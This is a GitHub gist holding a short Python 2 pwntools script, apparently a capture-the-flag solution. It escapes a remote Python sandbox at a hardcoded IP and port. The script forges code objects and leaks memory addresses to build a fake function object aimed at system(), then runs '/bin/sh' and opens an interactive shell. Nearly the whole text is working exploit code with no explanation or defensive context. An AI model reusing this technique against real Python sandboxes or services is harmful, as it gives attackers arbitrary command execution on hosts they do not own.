Skip to content

Instantly share code, notes, and snippets.

Created Apr 13, 2014
Embed
What would you like to do?
import sys
from pwn import *
from sys import stdout
import string, subprocess, re
def magic_function(index, constant_table):
return "(lambda x:x).__class__((lambda x:x).func_code.__class__(0, 0, 1, 67, 'd\\x%02X\\x%02XS', %s, (), (), 'test.py', 'f', 1, '\\x00\\x01', (), ()), {}, 'f', None, None)" % (index&0xff, index >> 8, constant_table)
def setvalue(var, value):
return '().__class__.__subclasses__()[0].__repr__.__func__.__setattr__("%s", %s)' % (var, value)
def getvalue(var):
return '().__class__.__subclasses__()[0].__repr__.__func__.%s' % var
def xranger(n):
return 'stdout.xreadlines.__str__.__objclass__.__subclasses__()[12](%d)' % n
def wat():
return '[%s for _ in %s]' % (magic_function(200), xranger(1000))
def do_cmd(s):
r.sendline(s)
return r.recvline()[:-1]
def do_tuple():
return '(0,)*10000'
r = remote('54.196.37.47', 9990, silent = True, timeout = 10)
# r = remote('127.0.0.1', 1234, silent = True, timeout = 10)
r.recvline()
system_meth_addr = 0x0000000000870480
PyCFunc_Type = 0x000000000087CE20
none_object = 0x000000000087E040
pyobject = flat("LLLLL", 500, PyCFunc_Type, system_meth_addr, 0, none_object, func = p64)
do_cmd(setvalue('obj', `pyobject`))
pyobject_addr = int(re.findall('0x([0-9a-f]*)', do_cmd('%s.__eq__' % getvalue('obj')))[0], 16)
do_cmd(setvalue('bar', do_tuple()))
tuple_addr = int(re.findall('0x([0-9a-f]*)', do_cmd('%s.__eq__' % getvalue('bar')))[0], 16)
ellipsis = p64(pyobject_addr+36)
do_cmd(setvalue('baz', "'AAAA' + %s*10000" % `ellipsis`))
string_addr = int(re.findall('0x([0-9a-f]*)', do_cmd('%s.__eq__' % getvalue('baz')))[0], 16)
assert (string_addr - tuple_addr) % 8 == 0
offset = 200 + (string_addr - tuple_addr) / 8
print hex(offset)
do_cmd(setvalue('foo', magic_function(offset, getvalue('bar'))))
print do_cmd(getvalue('foo'))
pause()
r.sendline(getvalue('foo') + '()("/bin/sh")')
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment